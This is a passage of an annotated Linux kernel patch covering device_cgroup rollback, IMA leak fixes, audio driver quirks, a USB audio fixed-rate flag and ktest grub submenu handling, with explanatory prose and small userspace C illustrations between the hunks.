+ 	subflow_request_sock_ipv6_ops = tcp_request_sock_ipv6_ops;
+ 	subflow_request_sock_ipv6_ops.route_req = subflow_v6_route_req;
+ 
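
The subflow.c rework above splits one shared request_sock_ops into per-family v4/v6 copies so each destructor can chain back to the matching TCP destructor, with a BUILD_BUG_ON guarding the assumption that the v4 and v6 request socks stay the same size. The specialization pattern, as an illustrative userspace sketch (struct and function names are made up):

#include <stdio.h>

struct req_ops {
	const char *slab_name;
	void (*destructor)(void);
};

static void tcp_v4_destruct(void) { puts("tcp v4 cleanup"); }

static struct req_ops tcp_v4_ops = { "request_sock_TCP", tcp_v4_destruct };
static struct req_ops subflow_v4_ops;

static void subflow_common_destruct(void) { puts("mptcp cleanup"); }

static void subflow_v4_destruct(void)
{
	subflow_common_destruct();	/* MPTCP-specific teardown */
	tcp_v4_destruct();		/* then the family's TCP teardown */
}

int main(void)
{
	subflow_v4_ops = tcp_v4_ops;	/* start from the TCP template */
	subflow_v4_ops.slab_name = "request_sock_subflow_v4";
	subflow_v4_ops.destructor = subflow_v4_destruct;
	subflow_v4_ops.destructor();
	return 0;
}
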
+diff --git a/security/device_cgroup.c b/security/device_cgroup.c
+index a9f8c63a96d1a..bef2b9285fb34 100644
+--- a/security/device_cgroup.c
++++ b/security/device_cgroup.c
+@@ -82,6 +82,17 @@ free_and_exit:
+ 	return -ENOMEM;
+ }
+ 
++static void dev_exceptions_move(struct list_head *dest, struct list_head *orig)
++{
++	struct dev_exception_item *ex, *tmp;
++
++	lockdep_assert_held(&devcgroup_mutex);
++
++	list_for_each_entry_safe(ex, tmp, orig, list) {
++		list_move_tail(&ex->list, dest);
++	}
++}
++
+ /*
+  * called under devcgroup_mutex
+  */
+@@ -604,11 +615,13 @@ static int devcgroup_update_access(struct dev_cgroup *devcgroup,
+ 	int count, rc = 0;
+ 	struct dev_exception_item ex;
+ 	struct dev_cgroup *parent = css_to_devcgroup(devcgroup->css.parent);
++	struct dev_cgroup tmp_devcgrp;
+ 
+ 	if (!capable(CAP_SYS_ADMIN))
+ 		return -EPERM;
+ 
+ 	memset(&ex, 0, sizeof(ex));
++	memset(&tmp_devcgrp, 0, sizeof(tmp_devcgrp));
+ 	b = buffer;
+ 
+ 	switch (*b) {
+@@ -620,15 +633,27 @@ static int devcgroup_update_access(struct dev_cgroup *devcgroup,
+ 
+ 			if (!may_allow_all(parent))
+ 				return -EPERM;
+-			dev_exception_clean(devcgroup);
+-			devcgroup->behavior = DEVCG_DEFAULT_ALLOW;
+-			if (!parent)
++			if (!parent) {
++				devcgroup->behavior = DEVCG_DEFAULT_ALLOW;
++				dev_exception_clean(devcgroup);
+ 				break;
++			}
+ 
++			INIT_LIST_HEAD(&tmp_devcgrp.exceptions);
++			rc = dev_exceptions_copy(&tmp_devcgrp.exceptions,
++						 &devcgroup->exceptions);
++			if (rc)
++				return rc;
++			dev_exception_clean(devcgroup);
+ 			rc = dev_exceptions_copy(&devcgroup->exceptions,
+ 						 &parent->exceptions);
+-			if (rc)
++			if (rc) {
++				dev_exceptions_move(&devcgroup->exceptions,
++						    &tmp_devcgrp.exceptions);
+ 				return rc;
++			}
++			devcgroup->behavior = DEVCG_DEFAULT_ALLOW;
++			dev_exception_clean(&tmp_devcgrp);
+ 			break;
+ 		case DEVCG_DENY:
+ 			if (css_has_online_children(&devcgroup->css))
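
The device_cgroup hunk above turns the allow-all update into a transaction: the current exception list is snapshotted into tmp_devcgrp before being cleared, and dev_exceptions_move() restores it if copying the parent's list fails, so the cgroup never ends up half-updated. An array-based stand-in for the rollback shape (simplified well past the kernel's list handling):

#include <errno.h>
#include <stdio.h>
#include <string.h>

#define MAX_EX 16

struct exlist { int n; int items[MAX_EX]; };

static int copy_list(struct exlist *dst, const struct exlist *src)
{
	if (src->n > MAX_EX)
		return -ENOMEM;		/* stand-in for kmalloc failure */
	memcpy(dst, src, sizeof(*src));
	return 0;
}

static int update_access(struct exlist *cg, const struct exlist *parent)
{
	struct exlist snapshot;
	int rc;

	copy_list(&snapshot, cg);	/* save the current state */
	cg->n = 0;			/* dev_exception_clean() */
	rc = copy_list(cg, parent);
	if (rc) {
		*cg = snapshot;		/* dev_exceptions_move() rollback */
		return rc;
	}
	return 0;
}

int main(void)
{
	struct exlist cg = { 2, { 1, 3 } };
	struct exlist parent = { 1, { 9 } };

	printf("rc=%d n=%d\n", update_access(&cg, &parent), cg.n);
	return 0;
}
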
+diff --git a/security/integrity/ima/Kconfig b/security/integrity/ima/Kconfig
+index 7249f16257c72..39caeca474449 100644
+--- a/security/integrity/ima/Kconfig
++++ b/security/integrity/ima/Kconfig
+@@ -112,7 +112,7 @@ choice
+ 
+ 	config IMA_DEFAULT_HASH_SM3
+ 		bool "SM3"
+-		depends on CRYPTO_SM3=y
++		depends on CRYPTO_SM3_GENERIC=y
+ endchoice
+ 
+ config IMA_DEFAULT_HASH
+diff --git a/security/integrity/ima/ima_main.c b/security/integrity/ima/ima_main.c
+index 040b03ddc1c77..4a207a3ef7ef3 100644
+--- a/security/integrity/ima/ima_main.c
++++ b/security/integrity/ima/ima_main.c
+@@ -542,8 +542,13 @@ static int __ima_inode_hash(struct inode *inode, struct file *file, char *buf,
+ 
+ 		rc = ima_collect_measurement(&tmp_iint, file, NULL, 0,
+ 					     ima_hash_algo, NULL);
+-		if (rc < 0)
++		if (rc < 0) {
++			/* ima_hash could be allocated in case of failure. */
++			if (rc != -ENOMEM)
++				kfree(tmp_iint.ima_hash);
++
+ 			return -EOPNOTSUPP;
++		}
+ 
+ 		iint = &tmp_iint;
+ 		mutex_lock(&iint->mutex);
+diff --git a/security/integrity/ima/ima_template.c b/security/integrity/ima/ima_template.c
+index 195ac18f09275..04c49f05cb74f 100644
+--- a/security/integrity/ima/ima_template.c
++++ b/security/integrity/ima/ima_template.c
+@@ -340,8 +340,11 @@ static struct ima_template_desc *restore_template_fmt(char *template_name)
+ 
+ 	template_desc->name = "";
+ 	template_desc->fmt = kstrdup(template_name, GFP_KERNEL);
+-	if (!template_desc->fmt)
++	if (!template_desc->fmt) {
++		kfree(template_desc);
++		template_desc = NULL;
+ 		goto out;
++	}
+ 
+ 	spin_lock(&template_list);
+ 	list_add_tail_rcu(&template_desc->list, &defined_templates);
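
The ima_template fix above closes a leak in a two-step allocation: when the second allocation (kstrdup) fails, the container allocated first must be freed and the pointer NULLed before taking the error path. The same shape in plain C (a toy, not the IMA code):

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

struct desc { const char *name; char *fmt; };

static struct desc *make_desc(const char *fmt)
{
	struct desc *d = malloc(sizeof(*d));

	if (!d)
		return NULL;
	d->name = "";
	d->fmt = strdup(fmt);
	if (!d->fmt) {
		free(d);	/* don't leak the container */
		return NULL;
	}
	return d;
}

int main(void)
{
	struct desc *d = make_desc("d-ng|n-ng");

	printf("%s\n", d ? d->fmt : "(alloc failed)");
	return 0;
}
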
+diff --git a/security/integrity/platform_certs/load_uefi.c b/security/integrity/platform_certs/load_uefi.c
+index b78753d27d8ea..d1fdd113450a6 100644
+--- a/security/integrity/platform_certs/load_uefi.c
++++ b/security/integrity/platform_certs/load_uefi.c
+@@ -35,6 +35,7 @@ static const struct dmi_system_id uefi_skip_cert[] = {
+ 	{ UEFI_QUIRK_SKIP_CERT("Apple Inc.", "MacPro7,1") },
+ 	{ UEFI_QUIRK_SKIP_CERT("Apple Inc.", "iMac20,1") },
+ 	{ UEFI_QUIRK_SKIP_CERT("Apple Inc.", "iMac20,2") },
++	{ UEFI_QUIRK_SKIP_CERT("Apple Inc.", "iMacPro1,1") },
+ 	{ }
+ };
+ 
+diff --git a/sound/pci/hda/patch_cs8409.c b/sound/pci/hda/patch_cs8409.c
+index 754aa8ddd2e4f..0ba1fbcbb21e4 100644
+--- a/sound/pci/hda/patch_cs8409.c
++++ b/sound/pci/hda/patch_cs8409.c
+@@ -888,7 +888,7 @@ static void cs42l42_resume(struct sub_codec *cs42l42)
+ 
+ 	/* Initialize CS42L42 companion codec */
+ 	cs8409_i2c_bulk_write(cs42l42, cs42l42->init_seq, cs42l42->init_seq_num);
+-	usleep_range(20000, 25000);
++	usleep_range(30000, 35000);
+ 
+ 	/* Clear interrupts, by reading interrupt status registers */
+ 	cs8409_i2c_bulk_read(cs42l42, irq_regs, ARRAY_SIZE(irq_regs));
+diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c
+index f5f640851fdcb..3794b522c2222 100644
+--- a/sound/pci/hda/patch_realtek.c
++++ b/sound/pci/hda/patch_realtek.c
+@@ -6903,6 +6903,34 @@ static void alc287_fixup_yoga9_14iap7_bass_spk_pin(struct hda_codec *codec,
+ 	}
+ }
+ 
++static void alc295_fixup_dell_inspiron_top_speakers(struct hda_codec *codec,
++					  const struct hda_fixup *fix, int action)
++{
++	static const struct hda_pintbl pincfgs[] = {
++		{ 0x14, 0x90170151 },
++		{ 0x17, 0x90170150 },
++		{ }
++	};
++	static const hda_nid_t conn[] = { 0x02, 0x03 };
++	static const hda_nid_t preferred_pairs[] = {
++		0x14, 0x02,
++		0x17, 0x03,
++		0x21, 0x02,
++		0
++	};
++	struct alc_spec *spec = codec->spec;
++
++	alc_fixup_no_shutup(codec, fix, action);
++
++	switch (action) {
++	case HDA_FIXUP_ACT_PRE_PROBE:
++		snd_hda_apply_pincfgs(codec, pincfgs);
++		snd_hda_override_conn_list(codec, 0x17, ARRAY_SIZE(conn), conn);
++		spec->gen.preferred_dacs = preferred_pairs;
++		break;
++	}
++}
++
+ enum {
+ 	ALC269_FIXUP_GPIO2,
+ 	ALC269_FIXUP_SONY_VAIO,
+@@ -7146,6 +7174,8 @@ enum {
+ 	ALC287_FIXUP_LEGION_16ITHG6,
+ 	ALC287_FIXUP_YOGA9_14IAP7_BASS_SPK,
+ 	ALC287_FIXUP_YOGA9_14IAP7_BASS_SPK_PIN,
++	ALC295_FIXUP_DELL_INSPIRON_TOP_SPEAKERS,
++	ALC236_FIXUP_DELL_DUAL_CODECS,
+ };
+ 
+ /* A special fixup for Lenovo C940 and Yoga Duet 7;
+@@ -9095,6 +9125,18 @@ static const struct hda_fixup alc269_fixups[] = {
+ 		.chained = true,
+ 		.chain_id = ALC287_FIXUP_YOGA9_14IAP7_BASS_SPK,
+ 	},
++	[ALC295_FIXUP_DELL_INSPIRON_TOP_SPEAKERS] = {
++		.type = HDA_FIXUP_FUNC,
++		.v.func = alc295_fixup_dell_inspiron_top_speakers,
++		.chained = true,
++		.chain_id = ALC269_FIXUP_DELL4_MIC_NO_PRESENCE,
++	},
++	[ALC236_FIXUP_DELL_DUAL_CODECS] = {
++		.type = HDA_FIXUP_PINS,
++		.v.func = alc1220_fixup_gb_dual_codecs,
++		.chained = true,
++		.chain_id = ALC255_FIXUP_DELL1_MIC_NO_PRESENCE,
++	},
+ };
+ 
+ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+@@ -9195,6 +9237,14 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x1028, 0x0a9e, "Dell Latitude 5430", ALC269_FIXUP_DELL4_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1028, 0x0b19, "Dell XPS 15 9520", ALC289_FIXUP_DUAL_SPK),
+ 	SND_PCI_QUIRK(0x1028, 0x0b1a, "Dell Precision 5570", ALC289_FIXUP_DUAL_SPK),
++	SND_PCI_QUIRK(0x1028, 0x0b37, "Dell Inspiron 16 Plus 7620 2-in-1", ALC295_FIXUP_DELL_INSPIRON_TOP_SPEAKERS),
++	SND_PCI_QUIRK(0x1028, 0x0b71, "Dell Inspiron 16 Plus 7620", ALC295_FIXUP_DELL_INSPIRON_TOP_SPEAKERS),
++	SND_PCI_QUIRK(0x1028, 0x0c19, "Dell Precision 3340", ALC236_FIXUP_DELL_DUAL_CODECS),
++	SND_PCI_QUIRK(0x1028, 0x0c1a, "Dell Precision 3340", ALC236_FIXUP_DELL_DUAL_CODECS),
++	SND_PCI_QUIRK(0x1028, 0x0c1b, "Dell Precision 3440", ALC236_FIXUP_DELL_DUAL_CODECS),
++	SND_PCI_QUIRK(0x1028, 0x0c1c, "Dell Precision 3540", ALC236_FIXUP_DELL_DUAL_CODECS),
++	SND_PCI_QUIRK(0x1028, 0x0c1d, "Dell Precision 3440", ALC236_FIXUP_DELL_DUAL_CODECS),
++	SND_PCI_QUIRK(0x1028, 0x0c1e, "Dell Precision 3540", ALC236_FIXUP_DELL_DUAL_CODECS),
+ 	SND_PCI_QUIRK(0x1028, 0x164a, "Dell", ALC293_FIXUP_DELL1_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1028, 0x164b, "Dell", ALC293_FIXUP_DELL1_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x103c, 0x1586, "HP", ALC269_FIXUP_HP_MUTE_LED_MIC2),
+diff --git a/sound/soc/jz4740/jz4740-i2s.c b/sound/soc/jz4740/jz4740-i2s.c
+index c4c1e89b47c1b..83cb81999c6fc 100644
+--- a/sound/soc/jz4740/jz4740-i2s.c
++++ b/sound/soc/jz4740/jz4740-i2s.c
+@@ -55,7 +55,8 @@
+ #define JZ_AIC_CTRL_MONO_TO_STEREO BIT(11)
+ #define JZ_AIC_CTRL_SWITCH_ENDIANNESS BIT(10)
+ #define JZ_AIC_CTRL_SIGNED_TO_UNSIGNED BIT(9)
+-#define JZ_AIC_CTRL_FLUSH		BIT(8)
++#define JZ_AIC_CTRL_TFLUSH		BIT(8)
++#define JZ_AIC_CTRL_RFLUSH		BIT(7)
+ #define JZ_AIC_CTRL_ENABLE_ROR_INT BIT(6)
+ #define JZ_AIC_CTRL_ENABLE_TUR_INT BIT(5)
+ #define JZ_AIC_CTRL_ENABLE_RFS_INT BIT(4)
+@@ -90,6 +91,8 @@ enum jz47xx_i2s_version {
+ struct i2s_soc_info {
+ 	enum jz47xx_i2s_version version;
+ 	struct snd_soc_dai_driver *dai;
++
++	bool shared_fifo_flush;
+ };
+ 
+ struct jz4740_i2s {
+@@ -116,19 +119,44 @@ static inline void jz4740_i2s_write(const struct jz4740_i2s *i2s,
+ 	writel(value, i2s->base + reg);
+ }
+ 
++static inline void jz4740_i2s_set_bits(const struct jz4740_i2s *i2s,
++	unsigned int reg, uint32_t bits)
++{
++	uint32_t value = jz4740_i2s_read(i2s, reg);
++	value |= bits;
++	jz4740_i2s_write(i2s, reg, value);
++}
++
+ static int jz4740_i2s_startup(struct snd_pcm_substream *substream,
+ 	struct snd_soc_dai *dai)
+ {
+ 	struct jz4740_i2s *i2s = snd_soc_dai_get_drvdata(dai);
+-	uint32_t conf, ctrl;
++	uint32_t conf;
+ 	int ret;
+ 
++	/*
++	 * When we can flush FIFOs independently, only flush the FIFO
++	 * that is starting up. We can do this when the DAI is active
++	 * because it does not disturb other active substreams.
++	 */
++	if (!i2s->soc_info->shared_fifo_flush) {
++		if (substream->stream == SNDRV_PCM_STREAM_PLAYBACK)
++			jz4740_i2s_set_bits(i2s, JZ_REG_AIC_CTRL, JZ_AIC_CTRL_TFLUSH);
++		else
++			jz4740_i2s_set_bits(i2s, JZ_REG_AIC_CTRL, JZ_AIC_CTRL_RFLUSH);
++	}
++
+ 	if (snd_soc_dai_active(dai))
+ 		return 0;
+ 
+-	ctrl = jz4740_i2s_read(i2s, JZ_REG_AIC_CTRL);
+-	ctrl |= JZ_AIC_CTRL_FLUSH;
+-	jz4740_i2s_write(i2s, JZ_REG_AIC_CTRL, ctrl);
++	/*
++	 * When there is a shared flush bit for both FIFOs, the TFLUSH
++	 * bit flushes both FIFOs. Flushing while the DAI is active would
++	 * cause FIFO underruns in other active substreams so we have to
++	 * guard this behind the snd_soc_dai_active() check.
++	 */
++	if (i2s->soc_info->shared_fifo_flush)
++		jz4740_i2s_set_bits(i2s, JZ_REG_AIC_CTRL, JZ_AIC_CTRL_TFLUSH);
+ 
+ 	ret = clk_prepare_enable(i2s->clk_i2s);
+ 	if (ret)
+@@ -443,6 +471,7 @@ static struct snd_soc_dai_driver jz4740_i2s_dai = {
+ static const struct i2s_soc_info jz4740_i2s_soc_info = {
+ 	.version = JZ_I2S_JZ4740,
+ 	.dai = &jz4740_i2s_dai,
++	.shared_fifo_flush = true,
+ };
+ 
+ static const struct i2s_soc_info jz4760_i2s_soc_info = {
+diff --git a/sound/usb/card.h b/sound/usb/card.h
+index 40061550105ac..6ec95b2edf863 100644
+--- a/sound/usb/card.h
++++ b/sound/usb/card.h
+@@ -131,6 +131,7 @@ struct snd_usb_endpoint {
+ 	bool lowlatency_playback;	/* low-latency playback mode */
+ 	bool need_setup;		/* (re-)need for hw_params? */
+ 	bool need_prepare;		/* (re-)need for prepare? */
++	bool fixed_rate;		/* skip rate setup */
+ 
+ 	/* for hw constraints */
+ 	const struct audioformat *cur_audiofmt;
+diff --git a/sound/usb/endpoint.c b/sound/usb/endpoint.c
+index 4aaf0784940b5..419302e2057e8 100644
+--- a/sound/usb/endpoint.c
++++ b/sound/usb/endpoint.c
+@@ -769,7 +769,8 @@ struct snd_usb_endpoint *
+ snd_usb_endpoint_open(struct snd_usb_audio *chip,
+ 		      const struct audioformat *fp,
+ 		      const struct snd_pcm_hw_params *params,
+-		      bool is_sync_ep)
++		      bool is_sync_ep,
++		      bool fixed_rate)
+ {
+ 	struct snd_usb_endpoint *ep;
+ 	int ep_num = is_sync_ep ? fp->sync_ep : fp->endpoint;
+@@ -825,6 +826,7 @@ snd_usb_endpoint_open(struct snd_usb_audio *chip,
+ 		ep->implicit_fb_sync = fp->implicit_fb;
+ 		ep->need_setup = true;
+ 		ep->need_prepare = true;
++		ep->fixed_rate = fixed_rate;
+ 
+ 		usb_audio_dbg(chip, "  channels=%d, rate=%d, format=%s, period_bytes=%d, periods=%d, implicit_fb=%d\n",
+ 			      ep->cur_channels, ep->cur_rate,
+@@ -1413,11 +1415,13 @@ static int init_sample_rate(struct snd_usb_audio *chip,
+ 	if (clock && !clock->need_setup)
+ 		return 0;
+ 
+-	err = snd_usb_init_sample_rate(chip, ep->cur_audiofmt, rate);
+-	if (err < 0) {
+-		if (clock)
+-			clock->rate = 0; /* reset rate */
+-		return err;
++	if (!ep->fixed_rate) {
++		err = snd_usb_init_sample_rate(chip, ep->cur_audiofmt, rate);
++		if (err < 0) {
++			if (clock)
++				clock->rate = 0; /* reset rate */
++			return err;
++		}
+ 	}
+ 
+ 	if (clock)
+diff --git a/sound/usb/endpoint.h b/sound/usb/endpoint.h
+index e67ea28faa54f..924f4351588ce 100644
+--- a/sound/usb/endpoint.h
++++ b/sound/usb/endpoint.h
+@@ -14,7 +14,8 @@ struct snd_usb_endpoint *
+ snd_usb_endpoint_open(struct snd_usb_audio *chip,
+ 		      const struct audioformat *fp,
+ 		      const struct snd_pcm_hw_params *params,
+-		      bool is_sync_ep);
++		      bool is_sync_ep,
++		      bool fixed_rate);
+ void snd_usb_endpoint_close(struct snd_usb_audio *chip,
+ 			    struct snd_usb_endpoint *ep);
+ int snd_usb_endpoint_set_params(struct snd_usb_audio *chip,
+diff --git a/sound/usb/implicit.c b/sound/usb/implicit.c
+index f3e8484b3d9cb..41ac7185b42b6 100644
+--- a/sound/usb/implicit.c
++++ b/sound/usb/implicit.c
+@@ -15,6 +15,7 @@
+ #include "usbaudio.h"
+ #include "card.h"
+ #include "helper.h"
++#include "pcm.h"
+ #include "implicit.h"
+ 
+ enum {
+@@ -455,7 +456,8 @@ const struct audioformat *
+ snd_usb_find_implicit_fb_sync_format(struct snd_usb_audio *chip,
+ 				     const struct audioformat *target,
+ 				     const struct snd_pcm_hw_params *params,
+-				     int stream)
++				     int stream,
++				     bool *fixed_rate)
+ {
+ 	struct snd_usb_substream *subs;
+ 	const struct audioformat *fp, *sync_fmt = NULL;
+@@ -483,6 +485,8 @@ snd_usb_find_implicit_fb_sync_format(struct snd_usb_audio *chip,
+ 		}
+ 	}
+ 
++	if (fixed_rate)
++		*fixed_rate = snd_usb_pcm_has_fixed_rate(subs);
+ 	return sync_fmt;
+ }
+ 
+diff --git a/sound/usb/implicit.h b/sound/usb/implicit.h
+index ccb415a0ea860..7f1577b6c4d38 100644
+--- a/sound/usb/implicit.h
++++ b/sound/usb/implicit.h
+@@ -9,6 +9,6 @@ const struct audioformat *
+ snd_usb_find_implicit_fb_sync_format(struct snd_usb_audio *chip,
+ 				     const struct audioformat *target,
+ 				     const struct snd_pcm_hw_params *params,
+-				     int stream);
++				     int stream, bool *fixed_rate);
+ 
+ #endif /* __USBAUDIO_IMPLICIT_H */
+diff --git a/sound/usb/pcm.c b/sound/usb/pcm.c
+index 9557bd4d1bbca..99a66d0ef5b26 100644
+--- a/sound/usb/pcm.c
++++ b/sound/usb/pcm.c
+@@ -157,6 +157,31 @@ find_substream_format(struct snd_usb_substream *subs,
+ 			   true, subs);
+ }
+ 
++bool snd_usb_pcm_has_fixed_rate(struct snd_usb_substream *subs)
++{
++	const struct audioformat *fp;
++	struct snd_usb_audio *chip = subs->stream->chip;
++	int rate = -1;
++
++	if (!(chip->quirk_flags & QUIRK_FLAG_FIXED_RATE))
++		return false;
++	list_for_each_entry(fp, &subs->fmt_list, list) {
++		if (fp->rates & SNDRV_PCM_RATE_CONTINUOUS)
++			return false;
++		if (fp->nr_rates < 1)
++			continue;
++		if (fp->nr_rates > 1)
++			return false;
++		if (rate < 0) {
++			rate = fp->rate_table[0];
++			continue;
++		}
++		if (rate != fp->rate_table[0])
++			return false;
++	}
++	return true;
++}
++
+ static int init_pitch_v1(struct snd_usb_audio *chip, int ep)
+ {
+ 	struct usb_device *dev = chip->dev;
+@@ -450,12 +475,14 @@ static int snd_usb_hw_params(struct snd_pcm_substream *substream,
+ 	struct snd_usb_audio *chip = subs->stream->chip;
+ 	const struct audioformat *fmt;
+ 	const struct audioformat *sync_fmt;
++	bool fixed_rate, sync_fixed_rate;
+ 	int ret;
+ 
+ 	ret = snd_media_start_pipeline(subs);
+ 	if (ret)
+ 		return ret;
+ 
++	fixed_rate = snd_usb_pcm_has_fixed_rate(subs);
+ 	fmt = find_substream_format(subs, hw_params);
+ 	if (!fmt) {
+ 		usb_audio_dbg(chip,
+@@ -469,7 +496,8 @@ static int snd_usb_hw_params(struct snd_pcm_substream *substream,
+ 	if (fmt->implicit_fb) {
+ 		sync_fmt = snd_usb_find_implicit_fb_sync_format(chip, fmt,
+ 								hw_params,
+-								!substream->stream);
++								!substream->stream,
++								&sync_fixed_rate);
+ 		if (!sync_fmt) {
+ 			usb_audio_dbg(chip,
+ 				      "cannot find sync format: ep=0x%x, iface=%d:%d, format=%s, rate=%d, channels=%d\n",
+@@ -482,6 +510,7 @@ static int snd_usb_hw_params(struct snd_pcm_substream *substream,
+ 		}
+ 	} else {
+ 		sync_fmt = fmt;
++		sync_fixed_rate = fixed_rate;
+ 	}
+ 
+ 	ret = snd_usb_lock_shutdown(chip);
+@@ -499,7 +528,7 @@ static int snd_usb_hw_params(struct snd_pcm_substream *substream,
+ 		close_endpoints(chip, subs);
+ 	}
+ 
+-	subs->data_endpoint = snd_usb_endpoint_open(chip, fmt, hw_params, false);
++	subs->data_endpoint = snd_usb_endpoint_open(chip, fmt, hw_params, false, fixed_rate);
+ 	if (!subs->data_endpoint) {
+ 		ret = -EINVAL;
+ 		goto unlock;
+@@ -508,7 +537,8 @@ static int snd_usb_hw_params(struct snd_pcm_substream *substream,
+ 	if (fmt->sync_ep) {
+ 		subs->sync_endpoint = snd_usb_endpoint_open(chip, sync_fmt,
+ 							    hw_params,
+-							    fmt == sync_fmt);
++							    fmt == sync_fmt,
++							    sync_fixed_rate);
+ 		if (!subs->sync_endpoint) {
+ 			ret = -EINVAL;
+ 			goto unlock;
+diff --git a/sound/usb/pcm.h b/sound/usb/pcm.h
+index 493a4e34d78dc..388fe2ba346d6 100644
+--- a/sound/usb/pcm.h
++++ b/sound/usb/pcm.h
+@@ -6,6 +6,8 @@ void snd_usb_set_pcm_ops(struct snd_pcm *pcm, int stream);
+ int snd_usb_pcm_suspend(struct snd_usb_stream *as);
+ int snd_usb_pcm_resume(struct snd_usb_stream *as);
+ 
++bool snd_usb_pcm_has_fixed_rate(struct snd_usb_substream *as);
++
+ int snd_usb_init_pitch(struct snd_usb_audio *chip,
+ 		       const struct audioformat *fmt);
+ void snd_usb_preallocate_buffer(struct snd_usb_substream *subs);
+diff --git a/sound/usb/quirks.c b/sound/usb/quirks.c
+index 58b37bfc885cb..3d13fdf7590cd 100644
+--- a/sound/usb/quirks.c
++++ b/sound/usb/quirks.c
+@@ -2152,6 +2152,8 @@ static const struct usb_audio_quirk_flags_table quirk_flags_table[] = {
+ 		   QUIRK_FLAG_GENERIC_IMPLICIT_FB),
+ 	DEVICE_FLG(0x0525, 0xa4ad, /* Hamedal C20 usb camero */
+ 		   QUIRK_FLAG_IFACE_SKIP_CLOSE),
++	DEVICE_FLG(0x0ecb, 0x2069, /* JBL Quantum810 Wireless */
++		   QUIRK_FLAG_FIXED_RATE),
+ 
+ 	/* Vendor matches */
+ 	VENDOR_FLG(0x045e, /* MS Lifecam */
+diff --git a/sound/usb/usbaudio.h b/sound/usb/usbaudio.h
+index 2aba508a48312..f5a8dca66457f 100644
+--- a/sound/usb/usbaudio.h
++++ b/sound/usb/usbaudio.h
+@@ -175,6 +175,9 @@ extern bool snd_usb_skip_validation;
+  * QUIRK_FLAG_FORCE_IFACE_RESET
+  *  Force an interface reset whenever stopping & restarting a stream
+  *  (e.g. after xrun)
++ * QUIRK_FLAG_FIXED_RATE
++ *  Do not set PCM rate (frequency) when only one rate is available
++ *  for the given endpoint.
+  */
+ 
+ #define QUIRK_FLAG_GET_SAMPLE_RATE	(1U << 0)
+@@ -198,5 +201,6 @@ extern bool snd_usb_skip_validation;
+ #define QUIRK_FLAG_SKIP_IMPLICIT_FB	(1U << 18)
+ #define QUIRK_FLAG_IFACE_SKIP_CLOSE	(1U << 19)
+ #define QUIRK_FLAG_FORCE_IFACE_RESET	(1U << 20)
++#define QUIRK_FLAG_FIXED_RATE		(1U << 21)
+ 
+ #endif /* __USBAUDIO_H */
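
Tying the sound/usb changes above together: QUIRK_FLAG_FIXED_RATE only skips the rate request when every format on the substream advertises exactly one rate and all of them agree, which is what snd_usb_pcm_has_fixed_rate() checks. A standalone sketch of that loop over a flattened format list (struct layout is simplified, not the driver's):

#include <stdbool.h>
#include <stdio.h>

struct fmt { int nr_rates; int rates[4]; bool continuous; };

static bool has_fixed_rate(const struct fmt *f, int n)
{
	int i, rate = -1;

	for (i = 0; i < n; i++) {
		if (f[i].continuous || f[i].nr_rates > 1)
			return false;	/* more than one choice somewhere */
		if (f[i].nr_rates < 1)
			continue;
		if (rate < 0)
			rate = f[i].rates[0];
		else if (rate != f[i].rates[0])
			return false;	/* formats disagree on the rate */
	}
	return true;
}

int main(void)
{
	struct fmt fmts[] = { { 1, { 48000 } }, { 1, { 48000 } } };

	printf("%d\n", has_fixed_rate(fmts, 2));	/* 1 */
	return 0;
}
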
+diff --git a/tools/testing/ktest/ktest.pl b/tools/testing/ktest/ktest.pl
+index 09d1578f9d66f..1737c59e4ff67 100755
+--- a/tools/testing/ktest/ktest.pl
++++ b/tools/testing/ktest/ktest.pl
+@@ -1963,7 +1963,7 @@ sub run_scp_mod {
+ 
+ sub _get_grub_index {
+ 
+-    my ($command, $target, $skip) = @_;
++    my ($command, $target, $skip, $submenu) = @_;
+ 
+     return if (defined($grub_number) && defined($last_grub_menu) &&
+ 	$last_grub_menu eq $grub_menu && defined($last_machine) &&
+@@ -1980,11 +1980,16 @@ sub _get_grub_index {
+ 
+     my $found = 0;
+ 
++    my $submenu_number = 0;
++
+     while (<IN>) {
+ 	if (/$target/) {
+ 	    $grub_number++;
+ 	    $found = 1;
+ 	    last;
++	} elsif (defined($submenu) && /$submenu/) {
++		$submenu_number++;
++		$grub_number = -1;
+ 	} elsif (/$skip/) {
+ 	    $grub_number++;
+ 	}
+@@ -1993,6 +1998,9 @@ sub _get_grub_index {
+ 
+     dodie "Could not find '$grub_menu' through $command on $machine"
+ 	if (!$found);
++    if ($submenu_number > 0) {
++	$grub_number = "$submenu_number>$grub_number";
++    }
+     doprint "$grub_number\n";
+     $last_grub_menu = $grub_menu;
+     $last_machine = $machine;
+@@ -2003,6 +2011,7 @@ sub get_grub_index {
+     my $command;
+     my $target;
+     my $skip;
++    my $submenu;
+     my $grub_menu_qt;
+ 
+     if ($reboot_type !~ /^grub/) {
+@@ -2017,8 +2026,9 @@ sub get_grub_index {
+ 	$skip = '^\s*title\s';
+     } elsif ($reboot_type eq "grub2") {
+ 	$command = "cat $grub_file";
+-	$target = '^menuentry.*' . $grub_menu_qt;
+-	$skip = '^menuentry\s|^submenu\s';
++	$target = '^\s*menuentry.*' . $grub_menu_qt;
++	$skip = '^\s*menuentry';
++	$submenu = '^\s*submenu\s';
+     } elsif ($reboot_type eq "grub2bls") {
+ 	$command = $grub_bls_get;
+ 	$target = '^title=.*' . $grub_menu_qt;
+@@ -2027,7 +2037,7 @@ sub get_grub_index {
+ 	return;
+     }
+ 
+-    _get_grub_index($command, $target, $skip);
++    _get_grub_index($command, $target, $skip, $submenu);
+ }
+ 
+ sub wait_for_input {
+@@ -2090,7 +2100,7 @@ sub reboot_to {
+     if ($reboot_type eq "grub") {
+ 	run_ssh "'(echo \"savedefault --default=$grub_number --once\" | grub --batch)'";
+     } elsif (($reboot_type eq "grub2") or ($reboot_type eq "grub2bls")) {
+-	run_ssh "$grub_reboot $grub_number";
++	run_ssh "$grub_reboot \"'$grub_number'\"";
+     } elsif ($reboot_type eq "syslinux") {
+ 	run_ssh "$syslinux --once \\\"$syslinux_label\\\" $syslinux_path";
+     } elsif (defined $reboot_script) {
+@@ -3768,9 +3778,10 @@ sub test_this_config {
+     # .config to make sure it is missing the config that
+     # we had before
